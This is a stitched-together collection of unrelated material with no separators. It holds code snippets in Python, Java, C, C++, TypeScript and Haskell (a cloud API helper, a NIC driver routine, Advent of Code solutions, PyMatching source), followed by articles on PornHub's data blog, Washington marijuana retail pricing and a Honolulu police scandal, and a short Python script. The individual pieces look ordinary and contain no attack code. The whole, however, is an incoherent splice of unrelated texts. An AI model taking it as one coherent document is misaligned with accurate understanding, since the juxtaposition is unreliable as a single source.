def _vdc_get_by_id(self, arg_vdc_id): ret_vdc_id = 0 ret_vdc_dict = dict() api_params = dict(cloudspaceId=arg_vdc_id,) api_resp = self.decs_api_call(requests.post, "/restmachine/cloudapi/cloudspaces/get", api_params) if api_resp.status_code == 200: ret_vdc_id = arg_vdc_id ret_vdc_dict = json.loads(api_resp.content.decode('utf8')) else: self.result['warning'] = ("vdc_get_by_id(): failed to get VDC by ID {}. HTTP code {}, " "response {}.").format(arg_vdc_id, api_resp.status_code, api_resp.reason) return ret_vdc_id, ret_vdc_dict
package com.artemis.generator.model.type; import java.lang.reflect.Type; import java.util.ArrayList; import java.util.List; /** * Sourcecode generator agnostic model of class. * <p> * @author <NAME> */ public class TypeModel { public String name = "unnamed"; public String packageName = "com.artemis"; public List<MethodDescriptor> methods = new ArrayList<MethodDescriptor>(); public List<FieldDescriptor> fields = new ArrayList<FieldDescriptor>(); public Type superclass; public Type superinterface; // currently supports only 1 interface. /** Add method to model. */ public void add(MethodDescriptor method) { methods.add(method); } /** * Get method that matches signature exactly. * @return {@code method}, or {@code null}. */ public MethodDescriptor getMethodBySignature(String signature) { for (MethodDescriptor method : methods) { if (signature.equals(method.signature(true, true))) { return method; } } return null; } public void add(FieldDescriptor field) { fields.add(field); } }
/* This writes to the RX_DESC_WPTR register for the specified receive * descriptor ring. */ void efx_nic_notify_rx_desc(struct efx_rx_queue *rx_queue) { efx_dword_t reg; unsigned write_ptr; while (rx_queue->notified_count != rx_queue->added_count) { efx_build_rx_desc(rx_queue, rx_queue->notified_count & EFX_RXQ_MASK); ++rx_queue->notified_count; } wmb(); write_ptr = rx_queue->added_count & EFX_RXQ_MASK; EFX_POPULATE_DWORD_1(reg, FRF_AZ_RX_DESC_WPTR_DWORD, write_ptr); efx_writed_page(rx_queue->efx, &reg, FR_AZ_RX_DESC_UPD_DWORD_P0, rx_queue->queue); }
<reponame>MCHAMOUXCAPG/TeamSpirit import { Column } from "material-table"; export enum questionType { slider, fiveIcons, twoIcons, stars, } export interface ISurveyQuestion { number: number; question: string; type: questionType; images: string[]; } export interface IQuestionStatus { status?: string; valid: boolean; touched: boolean; } export interface IQuestionResponse { note: number; number: number; surveyCode: string; User: string | null; } export interface IValidationCode { code: string; User: string | null; } export interface ICurrentSurveyResult { Period: { StartDate: string; EndDate: string; }; Completed: string; CurrentResult: number; HistoricResult: number; } export interface IValidationUser { Email: string; Password: string; } export interface IResultsByUsers { Average: number; Notes: { Number: number; Note: number; SurveyCode: string }[]; User: string; } export interface IResultsByQuestions { Average: number; Notes: { Note: number; User: string }[]; QuestionNumber: number; } export interface ITeam { Frequency: number; Name: string; //TeamName Num_mumbers: number; StartDate: string; // format "2number2number-number1-31" } export interface ITeamDTO { Frequency: number; Name: string; //TeamName Num_mumbers: number; StartDate: string; // format "2number2number-number1-31" Surveys?: any; Users?: any; } export interface IRoleDTO { Id?: number; Name: string; UserID?: number; } export interface IUser { Id: number; Full_name: string; Email: string; Password: string; Role: IRole; Teams: ITeamDTO[]; } export interface IUserDTO { Id?: number; Full_name: string; Email: string; Password: string; Role: IRole; Teams: ITeamDTO[]; } export interface IUserTable { columns: Array<Column<IUserData>>; } export interface IUserData { Id: number; Full_name: string; Email: string; Password?: string; Role: string; Teams: string; tableData?: { id: number }; } export interface ITeamTable { columns: Array<Column<ITeamData>>; } export interface ITeamData { Frequency: number; Name: string; //TeamName Num_mumbers: number; StartDate: string; // format "2number2number-number1-31" tableData?: { id: number }; } export interface IRole { Id: number; Name: string; } export interface IHistoric { endDate: string; startDate: string; totalAverage: number; }
<reponame>MarinPostma/AOC2021 {-# LANGUAGE DeriveDataTypeable #-} {-# OPTIONS_GHC -fno-cse #-} module Lib ( entry ) where import System.Console.CmdArgs import Data.List import Control.Exception import Data.Void import Data.Char (digitToInt) import Data.Ratio import Data.Bits import Numeric import Data.Bifunctor import Debug.Trace import Control.Monad import Control.Arrow import Day4 import Day5 import Day6 import Day7 import Day8 import Day9 import Day10 import Day11 import Day12 import Day13 import Day14 import Day15 newtype Aoc = Aoc { day :: String } deriving (Show, Data, Typeable) aoc = Aoc { day = def &= help "The day you want to run" } entry :: IO () entry = runCmd . day =<< cmdArgs aoc runDay f = print . f . lines =<< getContents runCmd :: String -> IO () runCmd "day1_1" = runDay $ day1 0 . map read runCmd "day1_2" = runDay $ day1 2 . map read runCmd "day2_1" = runDay day2_1 runCmd "day2_2" = runDay day2_2 runCmd "day3_1" = runDay day3_1 runCmd "day3_2" = runDay day3_2 runCmd "day4_1" = day4_1 . lines =<< getContents runCmd "day4_2" = day4_2 . lines =<< getContents runCmd "day5_1" = day5_1 . lines =<< getContents runCmd "day5_2" = day5_2 . lines =<< getContents runCmd "day6_1" = day6_1 . lines =<< getContents runCmd "day6_2" = day6_2 . lines =<< getContents runCmd "day7_1" = day7_1 . lines =<< getContents runCmd "day7_2" = day7_2 . lines =<< getContents runCmd "day8_1" = day8_1 . lines =<< getContents runCmd "day8_2" = day8_2 . lines =<< getContents runCmd "day9_1" = day9_1 . lines =<< getContents runCmd "day9_2" = day9_2 . lines =<< getContents runCmd "day10_1" = day10_1 . lines =<< getContents runCmd "day10_2" = day10_2 . lines =<< getContents runCmd "day11_1" = day11_1 . lines =<< getContents runCmd "day11_2" = day11_2 . lines =<< getContents runCmd "day12_1" = day12_1 . lines =<< getContents runCmd "day12_2" = day12_2 . lines =<< getContents runCmd "day13_1" = day13_1 . lines =<< getContents runCmd "day13_2" = day13_2 . lines =<< getContents runCmd "day14_1" = day14_1 . lines =<< getContents runCmd "day15_1" = day15_1 . lines =<< getContents runCmd "day15_2" = day15_2 . lines =<< getContents runCmd _ = print "unknown day!" day1 :: Int -> [Int] -> Int day1 win input = length $ filter id (uncurry (<) <$> zip t (tail t)) where t = map sum $ transpose $ map (($ input) . drop) [0..win] day2_1 :: [String] -> Int day2_1 input = product $ foldl f [0, 0] $ map words input where f [x, y] ["forward", n] = [x + read n, y] f [x, y] ["down", n] = [x, y + read n] f [x, y] ["up", n] = [x, y - read n] f _ cmd = error $ "invalid command" ++ cmd !! 1 day2_2 :: [String] -> Int day2_2 input = product $ take 2 $ foldl f [0, 0, 0] $ map words input where f [x, y, aim] ["forward", n] = [x + read n, y + aim * read n, aim] f [x, y, aim] ["down", n] = [x, y, aim + read n] f [x, y, aim] ["up", n] = [x, y, aim - read n] f _ cmd = error $ "invalid command" ++ cmd !! 1 day3_1 :: [String] -> Int day3_1 = uncurry (*) . join bimap readBin . findMostLeastCommon day3_2 :: [String] -> Int day3_2 input = product $ map (readBin . ($ input)) [filterBits 0 (fst . findMostLeastCommon), filterBits 0 (snd . findMostLeastCommon)] readBin = fst . head . readInt 2 (`elem` "01") digitToInt filterBits :: Int -> ([String] -> String) -> [String] -> String filterBits _ _ [input] = input filterBits i screen input = filterBits (succ i) screen (filter (\xs -> xs !! i == screen input !! i) input) findMostLeastCommon :: [String] -> (String, String) findMostLeastCommon = foldl appendBit ("", "") . avg . transpose . map f where f = map digitToInt avg = map $ \xs -> sum xs % length xs appendBit (g, e) x = if x >= 1 % 2 then (g ++ "1", e ++ "0") else (g ++ "0", e ++ "1") compute x = x * complement x
def const_cgmap(ctxstr, cgmapfile, readdepth=4): cgmap = {} with open(cgmapfile) as infile: for chr in ctxstr.keys(): cgmap[chr] = ['-' for _ in xrange(len(ctxstr[chr]))] for line in infile: line = line.strip().split() chr = line[0] pos = int(line[2]) - 1 context = line[3] level = float(line[5]) depth = int(line[7]) if context in ['CG', 'CHG', 'CHH'] and depth >= readdepth: cgmap[chr][pos] = level return cgmap
def seek(self, frame): if frame != 0: raise EOFError
/** * Created by Administrator on 2014/7/27 0027. */ public class Candy { public int candy(int[] ratings) { if (null == ratings) { return 0; } int sum = ratings.length; int last = 1; for (int i = 0; i < ratings.length;) { if (i - 1 >= 0 && ratings[i] > ratings[i-1]) { last++; } else { last = 1; } int j = i + 1; for (; j < ratings.length && ratings[j-1] > ratings[j]; j++) { } if (j == i + 1) { sum += last - 1; } else { int calculatedByReverse = j - i; sum += (0 + calculatedByReverse - 1) * (j - i) / 2; if (last > calculatedByReverse) { sum += (last - calculatedByReverse); } last = 1; } i = j; } return sum; } public int candy2(int[] ratings) { int[] incs = new int[ratings.length]; for (int i = 1, inc = 1; i < ratings.length; ++i) { if (ratings[i] > ratings[i-1]) { incs[i] = inc++; } else { inc = 1; } } for (int i = ratings.length - 2, inc = 1; i >= 0; --i) { if (ratings[i] > ratings[i+1]) { incs[i] = Math.max(inc++, incs[i]); } else { inc = 1; } } int sum = ratings.length; for (int i = 0; i < incs.length; i++) { sum += incs[i]; } return sum; } public static void main(String[] args) { System.out.println(new Candy().candy(new int[]{4,2,3,4,1})); } }
#ifndef __SENSORS_H #define __SENSORS_H #include <stdint.h> #include "rfreport.h" enum value_type { SENSOR_INT, SENSOR_FLOAT, SENSOR_STRING, }; struct sensor_measurement { const char *property_name; const char *unit; enum value_type type; uint8_t precision; // How many decimals are valid int int_val; float float_val; char *char_val; }; struct sensor { // Common config char type[16]; char *mqtt_topic; // Which MQTT topic to use to report this sensor uint16_t rh_sensor_id; // Which RadioHead sensor ID corresponds to this sensor int poll_delay; // Driver specific config int gpio; int power_gpio; int output_gpio; // Internal state int enabled:1; unsigned int timer_id; void *driver_data; int (*poll)(struct sensor *, struct sensor_measurement *); int (*shutdown)(struct sensor *); struct sensor *next; }; void sensors_init(void); void sensors_report(struct sensor *sensor, const struct sensor_measurement *values, int n_values); void sensors_handle_rf_report(const struct rf_sensor_report *report); void sensors_shutdown(void); int bme280_init(struct sensor *sensor); int bme280_poll(struct sensor *sensor, struct sensor_measurement *out); int dht_init(struct sensor *sensor); int dht_poll(struct sensor *sensor, struct sensor_measurement *out); int ds18b20_init(struct sensor *sensor); int ds18b20_poll(struct sensor *sensor, struct sensor_measurement *out); int mh_z19_init(struct sensor *sensor); int mh_z19_poll(struct sensor *sensor, struct sensor_measurement *out); int gpio_ultrasound_init(struct sensor *sensor); int gpio_ultrasound_poll(struct sensor *sensor, struct sensor_measurement *out); int soil_moisture_init(struct sensor *sensor); int soil_moisture_poll(struct sensor *sensor, struct sensor_measurement *out); #endif
<reponame>bacali95/ngx-json-table<gh_stars>0 export * from './lib/lib/settings'; export * from './lib/ngx-json-table.component'; export * from './lib/ngx-json-table.module';
// Copyright 2022 PyMatching Contributors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #include "pymatching/sparse_blossom/flooder/graph_fill_region.h" #include "pymatching/sparse_blossom/flooder/graph.h" #include "pymatching/sparse_blossom/flooder_matcher_interop/varying.h" using namespace pm; GraphFillRegion::GraphFillRegion() : blossom_parent(nullptr), blossom_parent_top(this), alt_tree_node(nullptr), radius((0 << 2) + 1), shrink_event_tracker() { } GraphFillRegion::GraphFillRegion(GraphFillRegion &&other) : blossom_parent(other.blossom_parent), blossom_parent_top(other.blossom_parent_top == &other ? this : other.blossom_parent_top), alt_tree_node(std::move(other.alt_tree_node)), radius(std::move(other.radius)), shrink_event_tracker(std::move(other.shrink_event_tracker)), match(std::move(other.match)), blossom_children(std::move(other.blossom_children)), shell_area(std::move(other.shell_area)) { } bool GraphFillRegion::tree_equal(const GraphFillRegion &other) const { if (alt_tree_node != other.alt_tree_node || radius != other.radius || blossom_children.size() != other.blossom_children.size() || shell_area != other.shell_area) { return false; } if (blossom_children.empty()) return true; for (size_t i = 0; i < blossom_children.size(); i++) { if (blossom_children[i].edge != other.blossom_children[i].edge) return false; if (!blossom_children[i].region->tree_equal(*other.blossom_children[i].region)) return false; } return true; } bool GraphFillRegion::operator==(const GraphFillRegion &rhs) const { return tree_equal(rhs); } bool GraphFillRegion::operator!=(const GraphFillRegion &rhs) const { return !(rhs == *this); } void GraphFillRegion::add_match(GraphFillRegion *region, const CompressedEdge &edge) { match = Match{region, edge}; region->match = Match{this, edge.reversed()}; } void GraphFillRegion::cleanup_shell_area() { for (auto &detector_node : shell_area) { detector_node->reset(); } } void GraphFillRegion::clear_blossom_parent() { blossom_parent = nullptr; do_op_for_each_descendant_and_self([&](GraphFillRegion *descendant) { descendant->blossom_parent_top = this; for (DetectorNode *n : descendant->shell_area) { n->region_that_arrived_top = this; n->wrapped_radius_cached = n->compute_wrapped_radius(); } }); } void GraphFillRegion::clear_blossom_parent_ignoring_wrapped_radius() { blossom_parent = nullptr; do_op_for_each_descendant_and_self([&](GraphFillRegion *descendant) { descendant->blossom_parent_top = this; for (DetectorNode *n : descendant->shell_area) { n->region_that_arrived_top = this; } }); } void GraphFillRegion::wrap_into_blossom(GraphFillRegion *new_blossom_parent_and_top) { blossom_parent = new_blossom_parent_and_top; do_op_for_each_descendant_and_self([&](GraphFillRegion *descendant) { descendant->blossom_parent_top = new_blossom_parent_and_top; for (DetectorNode *n : descendant->shell_area) { n->region_that_arrived_top = new_blossom_parent_and_top; n->wrapped_radius_cached = n->compute_wrapped_radius(); } }); } bool GraphFillRegion::operator<=(const GraphFillRegion &rhs) const { const GraphFillRegion *r = this; while (r != nullptr && r != &rhs) { r = r->blossom_parent; } return r == &rhs; } bool GraphFillRegion::operator<(const GraphFillRegion &rhs) const { return this != &rhs && (*this <= rhs); } bool GraphFillRegion::operator>(const GraphFillRegion &rhs) const { return rhs < *this; } bool GraphFillRegion::operator>=(const GraphFillRegion &rhs) const { return rhs <= *this; }
/** * Tests whether the multiplication of {@code x*y} will cause long overflow */ public static boolean isOverflowMultiply(long x, long y) { long r = x * y; long ax = Math.abs(x); long ay = Math.abs(y); if (((ax | ay) >>> 31 != 0)) { if (((y != 0) && (r / y != x)) || (x == Long.MIN_VALUE && y == -1)) { return true; } } return false; }
In early October, we called on PornHub to seize the opportunity and build the greatest data-fueled brand blog of all time. A few months later, they’ve followed through, creating one of the most detailed cultural studies of human sexuality we’ve seen since William Masters and Virginia Johnson teamed up in the late ’50s. If you feel squeamish about reading a porn blog, don’t be. PornHub Insights is (pretty much) safe for work and dishes out some graduate-level research. Content marketers, take note: This is how to capture and publish the right data. PornHub receives an average of 35 million visitors daily, meaning there’s plenty of information to mine. The Insights blog now offers aggregate data that reveals fascinating stats about its users, including most popular search terms, time spent per visit, and the quantity of videos watched per visit. They’ve even broken down the numbers across the globe, comparing the viewing habits of different countries in a series of visually engaging infographics. From a content strategy perspective, this is data done right. From a sociological standpoint, the blog presents a commitment to data only rivaled by academic and peer-reviewed research. If you think I’m blowing smoke, compare PornHub’s subject matter to studies from Harvard Business School or the newly launched academic journal Porn Studies. PornHub’s results are fascinating. In Canada, for example, users spend the most time on the site in January. Monday registers the most visits, while Sunday receives the least. Also, on Canada Day, the country’s annual July 1 holiday, the site reported a decrease in traffic in every province. Want to read about similar details in the Philippines? You can. Malta? No problem. It turns out that trends about popular months and days for watching adult videos appear to hold true across borders and oceans. And if you need a fun fact to talk about at parties: Even though PornHub traffic decreases in almost every country for major worldwide events and holidays, the site reported an 8 percent increase in Japan on Christmas. (There’s a joke there—probably about the versatility of Toshiba products. I’m just not going to be the one who makes it.) Why exactly is PornHub publishing this blog? Because the data may be compelling enough to shake off some of the stigma associated with pornography, which could make the site more appealing to mainstream advertisers. Clearly, all kinds of people are watching porn, and the value of potential ad dollars is all about understanding these demographics. Aside from cultural data, PornHub Insights can also tell us quite a bit about how users are watching pornography, specifically when it comes to accessing “content” on video game consoles, tablets, and mobile devices. Those on Xbox, PS4, and Nintendo Wii view more pages on stay on the site longer than computer users. It’s not surprising that 52 percent of American PornHub traffic in 2013 came from mobile devices, an increase of 5 percentage points from 2012. Tablet usage also surged, while desktop traffic fell by 8 percentage points. Images via Pornhub.com/Insights To complement the blog, PornHub recently rolled out PornMD, a real-time scroll of popular search terms on the site. The site only features the text of the searches and some cool maps, but it also includes a number of phrases I wouldn’t feel comfortable saying in front of my nana, so be careful about visiting it at work. PornHub VP Corey Price told Esquire, “When we originally saw the data from the live searches we actually projected it on the wall of our office for a couple of months as everyone found it incredibly insightful and interesting.” It’s the modern take on Gawker’s big board—just a little bit raunchier. All these trends and stats are pieces to a puzzle of useful information. The more we know about that puzzle, the more we can understand how pornography fits into the overall digital experience. PornHub has created a unique brand publication that melds data with controversy and intrigue in a fascinating way. And if brands learn to emulate PornHub, more potent data will be coming soon. (We’ll leave the “That’s what she said” joke to you.) What’s the deal with The Content Strategist? At Contently, storytelling is the only marketing we do, and it works wonders. It could for you, too. Learn more.
“There will be a ton of froth in the water during the first three months. Folks will be squeezing each other and not making many friends.” Yes, Washington marijuana growers will have product ready for sale in the first week of July in time for the first wave of 20-30 stores receiving state licenses. Exactly which day those first stores will open, how much you’ll be able to buy and how much it will cost the consumer is still mostly an open question, but there will be legal weed on store shelves. But expect it to sell out fast. “There’s just no way it’s not going to sell out,” said Attila Soos, the owner of Verdavanti, one of the largest growers licensed so far. He will have product to offer stores for that first week, he said. “We’ll have product for retailers as long as they are licensed. We expect things to start rolling out July 1st, but it is safe to assume that not all retailers will receive their license July 1st, so you’ll likely see our products being rolled out in weekly phases across the state.” And there’s a tough, fast-paced, free-market battle going on right now as you read this story. Soos added: “We’re at a point where one gentleman wrote to every single producer and processor that he wanted to buy product, and he kept everyone in the contact list. The next retailer simply hit the reply-all button and said ‘I’ll match whatever you guys offer to him and on top of it I’ll add 15 percent.’ “There’s no real feasible way to meet the demand at this point.” And, according to many conversations we’ve had with growers and hopeful retailers, prices per gram will range from $15 to $25 (with some higher spikes and brief lows, possibly at $12 a gram) during those first few days and weeks, but then level out at … about the same range. While we’ve heard of some growers trying to lock in very high prices (we heard of one pitch to sell a pound at $6,500 to the retailer, who then has to tack on his/her costs and taxes), those are aberrations. By and large, from what we’ve heard, growers and retailers are looking long-term and don’t want to anger each other or the consumer. “We’re pioneers in the industry,” said John Evich, a retail hopeful. “We want to be among the first to open. We want to benefit the future of the industry, because my research tells me that if we charge everyone $25 a gram, people are going to be pissed off at the industry and say that retail is a joke.” Evich is part of retail hopeful Top Shelf Cannabis in Bellingham, owned by Thomas Beckely. He believes the store will be among the first licensed in the state. “We want to offer a wide variety of prices and quality that’s affordable,” Evich said. “I’ve had a lot of people tell me, ‘We’re just going to keep buying from the black market or from medical.’ And that’s what we don’t want to see. I want to see this come out, and the retail be looked at, and (Initiative) 502 be looked at, as a good thing and a fair thing.” Quick note on buying pot: All dried marijuana will be sold to consumers at one-ounce or less sizes, so “a 1/4” is … well … 7.08 grams. “An 1/8th” is 3.54 grams and so on. Some retailers will sell an 1/8th or a 1/4 for less than if you bought each gram separately. And, of course, a wide variety of edibles and other infused products will also, eventually, be available. “Our market research shows a low- to mid-level out-the-door pricing structure of $12-15 dollars a gram, with some higher-level product going as high as $25,” said Sam Calvert, a retail hopeful in Spokane. “However, the higher price is a limited-target market, and will not support a retail going concern. Our informed (grower/processors) know our business model and are looking for sustainability in the marketplace.” Calvert said his retail operation, Green Star Cannabis, will be among the first wave of licensees in July. We chatted with him via email. “We do not have an opening date but an opening window of dates. We’re in negotiations with several local Producer/Processors (P&Ps) for usable marijuana with varied product availability schedules ranging from July 9th through August 15th. … Our primary concern is long-term relationships with model-efficient pricing P&Ps who understand our market place and demographic target.” No ‘first’ store According to Liquor Control Board spokesman Mikhail Carpenter, five retail applicants were ready for final inspection as of Wednesday. Meaning, all of their paperwork checks out and all that’s left is the walkthrough inspection to make sure their store actually has all the security and other equipment they’re supposed to have. “I’ve had my final review and passed and now I just need to finish my (store) front, get fingerprinted, and pass my inspection, which is supposed to happen in about a week,” said Austin Lott of the Fresh Greens retail hopeful in Winthrop. “I’ll be opening, probably, on the third of July … (if all goes well). I don’t have much info on prices — it’s all just speculation at this point. But I expect them to be higher than black market, certainly. They’ll come way down next year come November/December when the big outdoor crops come in.” The liquor board still plans to release the first licenses in a batch in early July (no day set), Carpenter said. Thus, despite some news reports that this or that store will be the “first,” no one store will be the first licensed, though perhaps a store could be the first to open doors after getting a license. Another retailer who expects to be opening in July in Millwood — “Sativa Sisters,” run by Cathy Smith et al — reports: “I have only one producer who has been brave enough to throw out a number. One gram for $6.30. Not a bad price but until testing who knows. Another producer/processor is telling me between $150 and $200 per oz (to the retailer). $150 works great but $200 means the black market might win. I am tying up any production I can, but so few have anything to sell. I currently hope to have 40 pounds to open. The quality is yet to be determined. Gram bags might be in the $20 range (for customers), ounce for top shelf could be about $600 … Most will be $350+.” What the growers are saying It’s one thing to hear from retailers, who clearly have an interest in seeing the lowest prices they can get coming in the door, but what are the growers saying? “There will be a ton of froth in the water during the first three months,” said Brian Stroh, grower/owner at CannaMan Farms. “Folks will be squeezing each other and not making many friends. I’ve been contacted by producers, processors and retailers, all with their own game on squeezing the market. “I’ve done my math and will produce 1/8th bags only at a price of $4,000/lb to the retailer. At this price point both the retailer and I make roughly (retailer slightly more) the same dollar amount on the transactional cost of $75 per eighth to the customer after sales tax.” That’s roughly $21 a gram to the consumer. Stroh said he’ll have around 10 pounds for sale to retailers the first week of July “and we intend to sprinkle it around the state for the opener. We will be in full production swing by late July with another 40 pounds.” Another grower said he’ll have 20 pounds of of indoor product available every two weeks starting July 28. “We will have outdoor product available in October. Depends on Mother Nature but a good guess is 750 lbs. Our price out the door is 7.50 a gram.” That’s around $3,400 a pound to retailers. “I have been approached with the idea of contracts at a pre-set price of $7 per gram, when the retailer plans to be at $20 per gram,” another grower told us. “I am hoping that nobody is fool enough to sign these contracts, and we all let the market speak.” This grower said he expects prices to range from $3,000 to $4,000 per pound to the retailer with prices “leveling off” in the $18 to $22 per gram range to consumers. But some think the prices will be higher. “In terms of pricing for the first wave,” said Soos of Verdavanti, a grower, “I would say $25 to $35 a gram on the retail side … I definitely think it’s feasible. They might say, ‘Oh we’ll sell it for less,’ but they’re going to be in a position to sell it. Even if they were going to say $50 a gram, somebody will buy it.” Ring in the outdoor grows The general expectation is that once September rolls around, outdoor-grown marijuana will start to hit the market and prices will stabilize. One outdoor grower we talked with hopes to have 600 pounds ready by Thanksgiving. This grower also wished to remain anonymous since there’s so much wheeling and dealing going on and no one wants to get locked into anything just yet. “Unlike medical,” the outdoor grower said, “the retailer cannot package for the purchaser. Purchasers cannot buy more than a ounce. If a retailer only wants 1 gram packages (454 grams per pound) the price per pound could triple vs. providing oz. size packages. At ounce packages, the wholesale price will be $1,600 to $2,000 per lb.” With outdoor at those prices (outdoor tends to be less expensive than indoor, just based on the production costs), buds should in a year average between $2,200 to $2,800 a pound to the retailers, who then have expenses and taxes to tack on. So in a year or so, according to general consensus, bud to retailers should pencil out to about $15 to $20 a gram to consumers with “premier” or “connoisseur” grade cannabis hitting $25 a gram and higher. Average for medical marijuana is currently between $10 a gram and $15 for premium. Colorado’s recreational prices are running around $15 to $25 a gram. Jake Ellison can be reached at 206-448-8334 or [email protected]. Follow Jake on Twitter at twitter.com/Jake_News. Also, swing by and *LIKE* his page on Facebook. If Google Plus is your thing, check out our marijuana coverage here.
Acting Honolulu Police Chief Cary Okimoto may face uncomfortable questions come January as he attempts to explain to police commissioners his proximity to a growing scandal involving a missing mailbox. On Tuesday, Okimoto took over the nation’s 20th-largest police department after his boss, Chief Louis Kealoha, voluntarily went on paid leave as a federal grand jury continues to investigate him and his wife regarding allegations off corruption and abuse of power. The Honolulu Police Commission, which has the authority to fire the chief, meets Jan. 4. Okimoto is closely tied to some of the allegations that have already resulted in one former police officer pleading guilty to a felony conspiracy charge. Cory Lum/Civil Beat The Kealohas have been accused of framing Gerard Puana, the estranged uncle of the chief’s wife, Katherine, for the theft of their mailbox in 2013. Katherine Kealoha is a city prosecutor and a supervisor in the career criminal division. She and Puana have been locked in a bitter family dispute over money for several years. Last week, retired HPD Officer Niall Silva, who worked in the department’s clandestine Criminal Intelligence Unit, admitted in federal court that he and five unnamed co-conspirators — four of them fellow cops — worked alongside “Co-conspirator No. 1,” who police records show is Katherine Kealoha, to frame Puana for the mailbox theft. “There are two issues: One is whether criminal activity actually occurred at the Honolulu Police Department, and two is whether the public will be comfortable with an interim chief who appears to have been in Chief Kealoha’s inner circle.” — Police Commissioner Loretta Sheehan In 2013, Okimoto was the major in charge of the patrol district that oversaw the elite unit of police officers who investigated and arrested Puana. He’s also been called to testify before the federal grand jury that’s been empaneled by the U.S. Justice Department as part of its criminal investigation into the Kealohas and other members of Honolulu’s law enforcement community. Puana’s criminal defense attorney, Alexander Silvert, said this week that Okimoto’s ties to the mailbox case should worry the Police Commission, especially as its members — most of whom have been full-throated supporters of Kealoha — grapple with how to repair the department’s reputation. “It’s none of my business who is appointed chief of police by the Police Commission,” said Silvert, a federal public defender. “However, I find it disturbing that an individual who may have some role in some way with this case could be considered for that position without a serious investigation into his conduct and involvement.” ‘Questions Have To Be Asked’ Okimoto was a major in command of HPD District 6, which covers Waikiki, from February 2013 to August 2014. Silvert said the crime reduction unit from that district was heavily involved in the investigation, secret surveillance and arrest of Puana for the mailbox theft, despite the fact that the alleged crime occurred in Kahala, part of HPD District 7. Puana was also arrested outside Distsrict 6. He was taken into custody June 29, 2013, in a church parking lot on Kaheka Street, which is in District 1. Cory Lum/Civil Beat Each patrol district on Oahu has a crime reduction unit, or CRU as it’s commonly known. Each CRU (pronounced “crew”) has about 10 officers, mostly plainclothes, who target street crimes, such as robbery, burglary and patterned car break-ins. But the units can also conduct surveillance or assist in high-profile crimes. In the mailbox case, police records show there were at least eight officers involved in the investigation and arrest of Puana, including Dru Akagi, a homicide detective in HPD’s Criminal Investigation Division who had been assigned by Lt. Walter Calistro. Silvert also noted that the two sergeants in charge of the Waikiki CRU that arrested Puana — Michael Cusumano and John Haina — were both on the board of directors of the State of Hawaii Organization of Police Officers, the statewide police union that had backed Kealoha’s bid for chief in 2009. Cusumano and Haina were also known within the department as the chief’s surfing buddies. They were both named as sergeants of the year in 2014. Given the scope of the federal investigation and the allegations that have come out so far — that several officers worked in concert to put an innocent man in jail to help settle a personal score for their boss and his wife — Silvert said the Police Commission needs to start taking its responsibilities more seriously. Silvert has criticized the commission in the past for being weak and ineffective in its handling of the mailbox case. He said it should not follow the same tack with Okimoto, who he believes deserves a thorough vetting, especially if he’s going to be in charge of HPD. Silvert said that Okimoto’s proximity to his client’s arrest needs to be explored by the commission, an independent oversight agency. “From what I think, questions have to be asked about what he knew, when he knew it and, if he didn’t know it, why he didn’t,” Silvert said. “They are responsible questions. They are pertinent questions. They need to be answered, and the commission needs to be satisfied with the answers. More importantly, the commission needs to look at documents to (validate) those answers. I’m tired of the commission simply talking to people and taking their word. That’s not what a thorough investigation implies.” Silvert added that during his own investigation of the mailbox theft — the evidence of which he ultimately turned over to the FBI — he did not find any information that directly implicated Okimoto in any wrongdoing. How Close Was Okimoto To Kealoha? Okimoto declined a Civil Beat interview request to discuss his involvement in the mailbox case. During a press conference Tuesday to announce Kealoha’s leave, Okimoto acknowledged that he was the major in Waikiki who oversaw the CRU unit that ultimately arrested Puana. Asked if he was aware that his unit, which he was ultimately in charge of, had in fact arrested Puana, Okimoto said he was “not sure.” Okimoto added that he did not have any discussions with the chief about the allegations involving the mailbox theft or the alleged framing of Puana that Silva pleaded guilty to last week. “The key point here is that he did not get a target letter.” — Police Commission Chairman Max Sword, referring to Okimoto Okimoto refused to discuss any of his testimony before the grand jury and told the media that he had not been served with a Justice Department target letter, similar to the one Kealoha and other officers received, indicating they are suspected of committing crimes. Should he receive a target letter, Okimoto said, “I would have to step down.” Okimoto has 32 years of experience with HPD. He was promoted to deputy chief Oct. 1, 2015 to replace Dave Kajihiro, who retired after 30 years with the department. As deputy chief, Okimoto was assigned to oversee the HPD’s administrative operations, which include training, finance, communications and the professional standards office, which is formerly known as the internal affairs division. When Okimoto became deputy chief, it was his second promotion of the year. In April 2015, Okimoto was promoted from major to assistant chief. Cory Lum/Civil Beat Police Commission Chairman Max Sword did not respond to a Civil Beat request for comment about Okimoto. But at Tuesday’s press conference, he said Okimoto’s connection to the ongoing investigation, at least as a grand jury witness, does not preclude him from running the department. “The key point here is that he did not get a target letter,” Sword said. Honolulu Managing Director Roy Amemiya, who was serving as acting mayor for vacationing Kirk Caldwell, said that the administration has “full confidence” in Okimoto to run the department while the Police Commission determines what comes next. But Police Commissioner Loretta Sheehan said she has a number of concerns about Okimoto’s appointment, some of which echo Silvert’s own worries about the acting chief. Sheehan made clear, as she’s required to under Police Commission rules, that her views don’t represent those of her colleagues or the agency as a whole. Sheehan said commissioners should be “very cautious” given Okimoto’s close relationship to the chief, especially considering the fact that Kealoha had twice promoted Okimoto within the department. She also wants him to explain what involvement, if any, he had in the Puana case. “The alleged crime happened in District 7, the arrest occurred eight days later in District 1, so I’d like to know why District 6 officers were involved in the surveillance and arrest of Mr. Puana and what Cary Okimoto knows about that,” Sheehan said. “There are two issues: One is whether criminal activity actually occurred at the Honolulu Police Department, and two is whether the public will be comfortable with an interim chief who appears to have been in Chief Kealoha’s inner circle.” Whether Okimoto will answer these questions in a public forum remains to be seen. Police commissioners tend to hold most of their discussions behind closed doors in executive session. There’s no indication so far that the Jan. 4 meeting will be any different. In addition to the chief, at least four other police officers have received target letters from the Department of Justice. The department, which has a history of shielding the identity of officers accused of wrongdoing, has refused to identify them. “There are sensitive matters that should be discussed in executive session, and I think they are frequently intermingled with topics that should be discussed in open session,” Sheehan said. “I think it’s going to be difficult to navigate having that conversation when parts of it should be public and parts of it should be private.”
num = input() num = list(map(int, num.split())) lst = [] for i in range(num[0]): button = input() button = list(map(int, button.split())) button.remove(button[0]) for elem in button: if elem not in lst: lst.append(elem) lst.sort() if lst == list(range(1, num[1]+1)): print("YES") else: print("NO")
